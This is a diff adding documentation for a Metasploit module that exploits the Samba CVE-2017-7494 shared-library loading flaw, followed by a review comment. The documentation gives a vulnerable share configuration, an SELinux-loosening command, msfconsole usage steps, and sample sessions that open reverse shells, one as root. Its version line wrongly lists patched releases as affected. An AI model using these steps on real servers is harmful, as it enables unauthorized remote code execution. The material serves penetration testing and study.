|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. |
| 4 | +Samba's download archives are [here](https://download.samba.org/pub/samba/stable/). There are some requirements |
| 5 | +for this exploit to be successful: |
| 6 | + |
| 7 | +1. Valid credentials |
| 8 | +2. Writeable folder in an accessible share |
| 9 | +3. Server-side path of the writeable folder |
| 10 | + |
| 11 | +However, in some cases anonymous access with common filesystem locations can be used to automate exploitation. |
| 12 | + |
| 13 | +A vulnerable Samba config may have a share similar to the following in `smb.conf`. This is a setup for 'easy' exploitation |
| 14 | +where no SMB options are required to be set: |
| 15 | + |
| 16 | +``` |
| 17 | +[exploitable] |
| 18 | +comment = CVE-2017-7494 |
| 19 | +path = /tmp |
| 20 | +writable = yes |
| 21 | +browseable = yes |
| 22 | +guest ok = yes |
| 23 | +``` |
| 24 | + |
| 25 | +Verified on: |
| 26 | + |
| 27 | +1. Synology DS412+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9) |
| 28 | +2. Synology DS412+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9) |
| 29 | +3. Synology DS1512+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9) |
| 30 | +4. Synology DS1512+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9) |
| 31 | +5. Synology DS2415+ DSM 6.1-15047 (Samba 4.3.11) |
| 32 | +6. Ubuntu 14.04.5 x64 (Samba 4.3.9) |
| 33 | +7. Ubuntu 15.04 (Samba 4.1.13) |
| 34 | +8. Ubuntu 16.04 (Samba 4.3.11) |
| 35 | +9. Fedora 24 (Samba 4.4.13) |
| 36 | + |
| 37 | +Currently not working against: |
| 38 | + |
| 39 | +1. QNAP NAS Samba 4.4.9 on armv71 |
| 40 | +2. WD MyClous NAS Samba 4.0.0rc5 armv71 |
| 41 | + |
| 42 | +### SELinux |
| 43 | + |
| 44 | +Fedora (and possibly Redhat) are not exploitable in their default installation. SELinux must be adjusted to allow nmbd to use net_admin, and smbd to exec the payload. |
| 45 | + |
| 46 | +``` |
| 47 | +echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } for pid=2365 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0\ntype=AVC msg=audit(1495717997.099:267): avc: denied { net_admin } for pid=959 comm="nmbd" capability=12 scontext=system_u:system_r:nmbd_t:s0 tcontext=system_u:system_r:nmbd_t:s0 tclass=capability permissive=0\ntype=AVC msg=audit(1495745002.690:308): avc: denied { execmem } for pid=1830 comm="smbd" scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:system_r:smbd_t:s0 tclass=process permissive=0\ntype=AVC msg=audit(1495745183.319:331): avc: denied { execute } for pid=2313 comm="smbd" path="/tmp/ucFtDpZI.so" dev="tmpfs" ino=27436 scontext=system_u:system_r:smbd_t:s0 tcontext=system_u:object_r:smbd_tmp_t:s0 tclass=file permissive=0" | audit2allow -M cve-2017-7494; semodule -X 300 -i cve-2017-7494.pp |
| 48 | +``` |
| 49 | + |
| 50 | +## Verification Steps |
| 51 | + |
| 52 | +1. Start msfconsole |
| 53 | +2. Do: ```use exploit/linux/samba/is_known_pipename``` |
| 54 | +3. Do: ```set rhost [ip]``` |
| 55 | +4. Do: ```set target [target #]``` |
| 56 | +5. Do: ```exploit``` |
| 57 | + |
| 58 | +## Options |
| 59 | + |
| 60 | + **SMB_SHARE_NAME** |
| 61 | + |
| 62 | + The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this |
| 63 | + variable is non-blank, it will be preferred. |
| 64 | + |
| 65 | + **SMB_SHARE_BASE** |
| 66 | + |
| 67 | + The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are |
| 68 | + brute forced including: |
| 69 | + |
| 70 | +1. /volume1 |
| 71 | +2. /volume2 |
| 72 | +3. /volume3 |
| 73 | +4. /shared |
| 74 | +5. /mnt |
| 75 | +6. /mnt/usb |
| 76 | +7. /media |
| 77 | +8. /mnt/media |
| 78 | +9. /var/samba |
| 79 | +10. /tmp/home/home/shared |
| 80 | + |
| 81 | + **SMB_FOLDER** |
| 82 | + |
| 83 | + The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this |
| 84 | + variable is non-blank, it will be preferred. |
| 85 | + |
| 86 | +## Scenarios |
| 87 | + |
| 88 | +### Synology DS412+ w/ INTEL Atom D2700 on DSM 6.1.1-15101 Update 2 |
| 89 | + |
| 90 | +``` |
| 91 | +msf exploit(is_known_pipename) > exploit |
| 92 | +
|
| 93 | +[*] Started reverse TCP handler on 1.2.3.117:4444 |
| 94 | +[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path |
| 95 | +[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so |
| 96 | +[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so... |
| 97 | +[-] 1.2.3.119:445 - Probe: /volume1/eePUbtdw.so: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0) |
| 98 | +[*] 1.2.3.119:445 - Trying location /volume1/ESX/eePUbtdw.so... |
| 99 | +[*] Command shell session 1 opened (1.2.3.117:4444 -> 1.2.3.119:34366) at 2017-05-24 21:12:07 -0400 |
| 100 | +
|
| 101 | +id |
| 102 | +uid=0(root) gid=0(root) groups=0(root),100(users) |
| 103 | +uname -a |
| 104 | +Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Linux synology_cedarview_412+ |
| 105 | +``` |
| 106 | + |
| 107 | +### Ubuntu 16.04 |
| 108 | + |
| 109 | +``` |
| 110 | +msf exploit(is_known_pipename) > exploit |
| 111 | +
|
| 112 | +[*] Started reverse TCP handler on 192.168.0.3:4444 |
| 113 | +[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path |
| 114 | +[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so |
| 115 | +[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so... |
| 116 | +[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500 |
| 117 | +
|
| 118 | +id |
| 119 | +uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup) |
| 120 | +``` |
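Review bot: The version statement in the first paragraph of "Vulnerable Application" lists the patched releases as if they were exploitable: 4.4.14, 4.5.10 and 4.6.4 are the releases that fix CVE-2017-7494, so "from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4" should read that all versions from 3.5.0 onward are affected and that 4.4.14, 4.5.10 and 4.6.4 (and later) are fixed. The Scenarios section also leaves an important point undocumented: the Synology session runs as `uid=0(root)` while the Ubuntu 16.04 session runs as `uid=65534(nobody)`, so the Options or Scenarios text should state that the loaded library executes with the privileges of the smbd process serving the share, which is why a `guest ok = yes` share on a stock distribution yields `nobody` rather than root; defenders reading this should also see that the SELinux section describes deliberately loosening smbd's confinement (`execstack`, `execmem`, `execute` on `smbd_tmp_t`) for a test box, which is the same policy that blocks the exploit by default on Fedora. Minor style: "WD MyClous" in "Currently not working against" should be "WD MyCloud"; the Verification Steps use triple backticks inline (```` ```use exploit/linux/samba/is_known_pipename``` ````) where single backticks are the convention; and "Writeable" / "Writable" are used inconsistently between the requirements list and the SMB_FOLDER option.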